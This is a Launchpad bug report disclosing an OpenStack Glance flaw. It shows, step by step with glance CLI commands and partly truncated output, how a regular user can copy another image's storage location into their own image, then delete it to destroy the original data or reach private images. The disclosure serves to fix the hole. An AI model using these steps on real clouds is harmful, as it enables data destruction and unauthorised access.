Comment 0 for bug 1546507
Revision history for this message
| Mike Fedosin (mfedosin) wrote Regular user can delete any image file | #0 |
© 2004
Canonical Ltd.
•
Terms of use
•
Data privacy
•
Contact Launchpad Support
•
Blog
•
Careers
•
System status
•
73416ba
(Get the code!)
Any user can delete any public image data or get access to private image just knowing the image id.
Glance allows to add custom location to image and this behavior is really harmful.
Scenario of deleting image data in Ceph backend with current devstack configuration
1. User gets list of images:
mfedosin@winter ~ $ glance image-list
+------
| ID | Name |
+------
| 0741cbc7-
| 2e4b6dca-
| 39599dd3-
| 153397f8-
+------
2. User requests info about public image he wants to delete:
mfedosin@winter ~ $ glance image-show 2e4b6dca-
+------
| Property | Value |
+------
| checksum | ee1eca47dc88f48
| container_format | bare |
| created_at | 2016-02-
| direct_url | rbd://647f7ae8-
| | 4463cd7038de/snap |
| disk_format | qcow2 |
| id | 2e4b6dca-
| min_disk | 0 |
| min_ram | 64 |
| name | TestVM |
| owner | 1c6cea59a605437
| protected | False |
| size | 13287936 |
| status | active |
| tags | [] |
| updated_at | 2016-02-
| virtual_size | None |
| visibility | public |
+------
Optional: User may try to download image file with "glance image-download 2e4b6dca-
3. User copies direct image url: from 'direct_url' or 'locations' field
rbd://647f7ae8-
4. User creates new image instance in db and sets custom location with "glance --os-image-
mfedosin@winter ~ $ glance --os-image-
+------
| Property | Value |
+------
| checksum | None |
| container_format | bare |
| created_at | 2016-02-
| deleted | False |
| deleted_at | None |
| disk_format | qcow2 |
| id | b12c6965-
| is_public | False |
| min_disk | 0 |
| min_ram | 0 |
| name | rerere |
| owner | fa343a042d2b47c
| protected | False |
| size | 13287936 |
| status | active |
| updated_at | 2016-02-
| virtual_size | None |
+------
Optional: User may try to verify that image has desired location
mfedosin@winter ~ $ glance image-show b12c6965-
+------
| Property | Value |
+------
| checksum | None |
| container_format | bare |
| created_at | 2016-02-
| direct_url | rbd://647f7ae8-
| | 4463cd7038de/snap |
| disk_format | qcow2 |
| id | b12c6965-
| min_disk | 0 |
| min_ram | 0 |
| name | rerere |
| owner | fa343a042d2b47c
| protected | False |
| size | 13287936 |
| status | active |
| tags | [] |
| updated_at | 2016-02-
| virtual_size | None |
| visibility | private |
+------
5. User deletes his image. Image data will be deleted too.
glance image-delete b12c6965-
mfedosin@winter ~ $ glance image-delete b12c6965-
mfedosin@winter ~ $ glance image-show b12c6965-
404 Not Found: No image found with ID b12c6965-
6. Trying to access public data will failed after that.
mfedosin@winter ~ $ glance --debug image-download 2e4b6dca-
curl -g -i -X GET -H 'Accept-Encoding: gzip, deflate' -H 'Accept: */*' -H 'User-Agent: python-
HTTP/1.1 204 No Content
Date: Wed, 17 Feb 2016 12:01:54 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 0
X-Openstack-
Traceback (most recent call last):
File "/usr/local/
args.
File "/usr/local/
utils.
File "/usr/local/
for chunk in data:
File "/usr/local/
self.
AttributeError: 'NoneType' object has no attribute 'close'
'NoneType' object has no attribute 'close'
mfedosin@winter ~ $ glance --version
1.2.0
Affected apis:
all v1 api without any chance to fix it - v1 always allows to set custom locations.
v2 api when 'show_multiple_
Affected schemes:
All, except 'swift+config' and 'file', because custom locations are forbidden for them.
If user knows private image id he can build and set custom location to his personal image, therefore get an access to private data.